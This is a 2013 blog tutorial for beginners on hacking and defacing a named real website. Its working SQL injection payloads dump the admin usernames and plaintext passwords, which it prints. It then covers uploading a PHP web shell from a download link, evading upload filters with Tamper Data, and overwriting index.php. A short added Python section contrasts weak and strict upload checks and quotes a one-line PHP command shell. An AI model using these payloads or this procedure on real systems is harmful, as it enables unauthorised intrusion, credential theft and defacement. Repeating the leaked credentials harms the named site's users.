Wednesday, 24 July 2013

Hacking a website with SQL Injection Explained for Beginners

hacking and defacing a site with SQL injection

This tutorial covers three things:
  • Getting the admin panel's credentials of a website through SQL injection
  • Uploading a shell
  • Defacing/hacking the site

Step 1:

Find a site vulnerable to SQL injection.

To find one we will use Google dorks. Google dorks are search queries that use Google's advanced search operators. Type the following query into Google:
inurl:news.php?nws=

This search lists sites that have a page matching news.php?nws= (a page that takes an id from the URL and looks it up in a database).

You will get many results. Open the first one; mine is http://www.area96.it/news.php?nws=61

Now we check whether this site is vulnerable to SQL injection. Add a single quote ' to the end of the URL:

http://www.area96.it/news.php?nws=61'

Nothing changed? Try putting the quote before the number (%27 is the URL-encoded form of '):
http://www.area96.it/news.php?nws=%2761

Still nothing? Try a double quote, in case the parameter sits inside a double-quoted string in the query:
http://www.area96.it/news.php?nws=61"

If the page still does not change, leave the site and move on to the next one.

Luckily I don't need to move to the next site; this one is vulnerable:

http://www.area96.it/news.php?nws=61'

Adding the ' changed the page's output. It now shows this message:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38

This is a PHP warning thrown because the query failed: the stray quote broke the SQL syntax, mysql_query() returned false instead of a result resource, and the script never checked for that before calling mysql_fetch_assoc(). It tells us our input reaches the SQL text unescaped, so the site can be injected. (The warning also leaks the server-side path of the script, which is useful later.)

One important thing to remember: sometimes a page shows errors that are not SQL errors, so do not assume those sites are injectable. How do you tell whether an error is an SQL error? As a beginner's rule of thumb, look for SQL keywords or database function names in the error text (mysql_, MySQL, "SQL syntax" and so on). A generic PHP notice or a 404 page proves nothing.
------------------------------------------------------------------------------------------------

Step 2 :

Admin Panel Finding:

Now you need to find the admin panel of the site, the page where the administrator logs in to maintain the site. There are several tools for this (they simply request a wordlist of common admin paths such as /admin/ or /administrator/ and report which ones exist). For this tutorial I will use this online admin-panel finder:

http://scan.subhashdasyam.com/admin-panel-finder.php

Paste the site link there, which is http://www.area96.it/, and click on dump.

It will start looking for the admin panel; after 2 or 3 minutes it gives you the result of the scan.

http://www.area96.it/admin/index.php is shown in green and all the others in red, meaning http://www.area96.it/admin/index.php is the admin panel of this website. Open it:
http://www.area96.it/admin/index.php
It asks for a username and password to log in. We will find those in the next step.
-------------------------------------------------------------------------------------------------

Step 3 :

Extracting Admin Panel Credentials:

We need a username and password to log in, so we go back to the injectable URL
http://www.area96.it/news.php?nws=61'
and use it to work out how many columns the page's query selects. Append an ORDER BY clause:
http://www.area96.it/news.php?nws=61' order by 1--+-

(The --+- at the end is a MySQL comment that swallows the rest of the original query, including its closing quote. MySQL only treats -- as a comment when it is followed by whitespace; the + becomes a space after URL decoding, and the trailing - is padding so that space is not trimmed away.)

Does the page stay the same?
http://www.area96.it/news.php?nws=61' order by 2--+-
Still the same? Keep increasing the number until the page errors:
http://www.area96.it/news.php?nws=61' order by 6--+-
Same.
http://www.area96.it/news.php?nws=61' order by 7--+-
Error: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38

ORDER BY 7 fails because there is no 7th column in the result, so the query selects 6 columns.

Now that we know the column count, we find which of those columns are actually displayed on the page. Write:

http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
Still the same page? Add a - sign before the number:
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-

The UNION must have the same number of columns as the original SELECT (6, from the ORDER BY step). Negating the id makes the original query's WHERE match no row, so the only row left to render is the one our UNION SELECT supplies, and the page prints our numbers wherever it would normally print the news item's fields.

Now the numbers
2
1
6
appear on the page. These three are the columns the page displays (the "vulnerable columns"); any one of them can carry the data we want to read. Next we use them to show the admin panel's username and password on the page.

Now change one small thing: pick any displayed column number and replace it with "group_concat(table_name)". I use column 2:
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-

and after the 6 add "from Information_schema.tables", like this:

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-

Hit enter. Instead of the number 2, the page now shows table names, like this:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET

These are table names, but they belong to the information_schema database itself (MySQL's catalogue of every database on the server, which comes first in an unfiltered listing). The output may also be cut short, because group_concat's result is limited to 1024 characters by default. We need the username and password, which live in the website's own database, so we restrict the listing to that database.

Add one more clause after information_schema.tables:
"where table_schema=database()"
(database() returns the name of the database the page's query runs against.) Like this:

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-

Now the page shows the tables of the site's own database:

accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,

These are the tables.

Now we need to guess which table holds the username and password. I guess "login", so we look at the login table first.

Now we send the query that lists the columns of the login table. Change:
"(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"

That clause should read where table_name='login'. Often a plain quoted string works here (our injection already got a ' through, after all), but when quotes are filtered or escaped by the application (magic_quotes_gpc, addslashes()) the comparison fails, so the usual trick is to write the table name without quotes: as a CHAR() list of decimal character codes, or as the hex literal 0x6c6f67696e. MySQL evaluates both to the string login.

To get the decimal codes you can use this site:

http://www.branah.com/ascii-converter

It converts any word to hex, decimal and binary. Type l o g i n into the ASCII converter box, with a space between every letter because the site wants space-separated characters, and click convert. The decimal box shows

108 111 103 105 110

Turn that into
CHAR(108, 111, 103, 105, 110)
by adding CHAR and a comma after each code. Use this instead of login, so the query becomes:

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--+-

The page shows the result:

id_login,username,password,email,admin,abilitato,id_friends

These are the columns of the table "login".
We only need username and password to log in to the admin panel, so now we send the query that prints them on the page.

Change "(column_name)" to "(username,0x3a,password)"
and after "from" remove everything and put "login".

0x3a is the hex literal for the : character; it separates the username from the password in each entry. The rest of the column list (3,4,5,6) must stay, because the UNION still has to match the 6 columns of the original query, and the table name should be written exactly as it appeared in the table list (login), since table names are case-sensitive on Linux MySQL servers by default. The URL becomes:
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password),3,4,5,6 from login--+-

The page shows this result:

davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0

meaning
1st user:
username=davide
password=cippalippa
2nd user:
username=curvedair
password=oblivion

etc.

The passwords here are stored in plain text; had they been hashed, you would have had to crack the hashes before you could log in. Now that we have a password, we move to the admin panel to hack the website.
-------------------------------------------------------------------------------------------------

Step 4:

Shell Uploading:

Go to
http://www.area96.it/admin/index.php
and log in with the username and password you just got:
username=davide
password=cippalippa

Logged in successfully.

Now you have access to change the website's products, news and so on, but to take full control we need to upload a shell to the website.

Shell: a shell (web shell) is a script, here a PHP file, that you upload to the site and then open in your browser. It acts as a control panel that lets you do whatever you want on the server, with the permissions of the web server process: browse and edit the files on the site's disk, upload more files, run commands and so on.

There are many shells available, but I will use and recommend MADSPOT-SHELL; it is the first Pakistani shell and the world's best.

You can download it from here:

http://www.mediafire.com/?8b6dmgdo7edkus2

Now find any place from which you can upload the shell, such as "add image" or "add product".

I have an "add news" option here, and it lets me attach an image to the news item.

I will try to upload madspotshell.php through the image upload section.

Just enter the news item; when it asks for the image, select madspotshell.php instead of an image.
Uploaded successfully.
Note: sometimes, as here, uploading shell.php directly is allowed. But most of the time file extensions are restricted, i.e. only jpg, png and gif can be uploaded. What to do then? We have a solution: we can tamper with the HTTP request using the Mozilla Firefox add-on called Tamper Data, rewriting the upload's headers (for instance the Content-Type the browser reports for the file) before the request reaches the server, which defeats checks that trust what the browser says about the file. Follow "Shell Uploading with Tamper Data" for a fuller explanation.

Now find where the shell was stored.

Normally the page shows a broken-image icon where the "image" should be. Right-click the icon, select "Copy image URL" / "Copy image location", and paste it into the address bar. Mine is

http://www.area96.it/images/news/1352954638mad.php

(The site renamed the file by prefixing a timestamp but kept the .php extension, and it stores uploads inside the web root, so the server executes the file when it is requested.)

Hit enter.

The shell opens. From here you can add, edit and remove any file.
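As an added example (not the page's or the shell's code), here is the server side of the upload step above, written in Python: a check that trusts the browser, which the Tamper Data trick defeats, beside one that decides from the file's own bytes and chooses the stored name itself. The request dicts are constructed for the example; the directory name images/news/ is taken from where the shell landed on the target above.

```python
import secrets

# Constructed uploads. TAMPERED is what the browser sends after the headers
# have been rewritten: a PHP file announced as a JPEG. HONEST is a real JPEG
# header (SOI + APP0 marker), enough for the magic-byte check below.
TAMPERED = {
    "filename": "madspotshell.php",
    "content_type": "image/jpeg",           # rewritten by the attacker
    "data": b"<?php system($_GET['cmd']); ?>",
}
HONEST = {
    "filename": "cover.jpg",
    "content_type": "image/jpeg",
    "data": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
}

# Allowed extensions and the bytes a file of that type must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
UPLOAD_DIR = "images/news/"   # web-served directory, as on the target above


def weak_accept(upload):
    """Trusts what the browser says. Both the Content-Type header and the
    filename are attacker-controlled, so a .php ends up in a directory the web
    server executes. Prefixing a timestamp, as the target did, changes nothing
    because the extension survives. Returns the stored path or None."""
    if not upload["content_type"].startswith("image/"):
        return None
    return UPLOAD_DIR + upload["filename"]


def strict_accept(upload):
    """Decides from the bytes, not the headers: the extension must be on the
    allowlist, the content must start with that type's magic bytes, and the
    stored name is generated server-side so the client controls no part of the
    path. Returns the stored path or None."""
    name = upload["filename"]
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    magic = ALLOWED.get(ext)
    if magic is None or not upload["data"].startswith(magic):
        return None
    return UPLOAD_DIR + secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    print("weak, tampered request:", weak_accept(TAMPERED))
    print("strict, tampered request:", strict_accept(TAMPERED))
    print("strict, honest request:", strict_accept(HONEST))
```

The magic-byte check stops a bare PHP file but not a valid image with PHP appended to it, so on its own it is not enough: the directory that receives uploads must also be one the web server will not execute scripts from, which is the setting the target above lacked.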

-------------------------------------------------------------------------------------------------

Final Step:

Defacement:

Now you are in the shell and want to deface the site. The site's default page is index: whenever someone opens
http://www.area96.it/
the server actually serves http://www.area96.it/index.php, so that is the file you need to replace.

In the shell you start in the directory where it was uploaded. I uploaded mine through the image section, so it is in
http://www.area96.it/images/news/

Near the top you can see this

PWD: /home/area96/area96.it/images/news/ |CURRENT|

which shows your current directory.

You need to edit index.php, which is located in area96.it, so click on area96.it in the
PWD: /home/area96/area96.it/images/news/ |CURRENT|
line.

That opens the PWD: /home/area96/area96.it/ |CURRENT|
directory.

In the center you can see the files in this folder, including index.php.

Rename your deface page to index.php and upload it here. It will overwrite the existing file, and whoever opens the site will see your deface page instead of the site. (The web server user has to have write permission on that directory, or the overwrite will fail.)

The upload button is at the bottom of the shell.

Just upload your index.php into /home/area96/area96.it/

and the site is hacked. Now open the website and see whether your name is there:

http://www.area96.it/
hacked by Pak Mad Hunters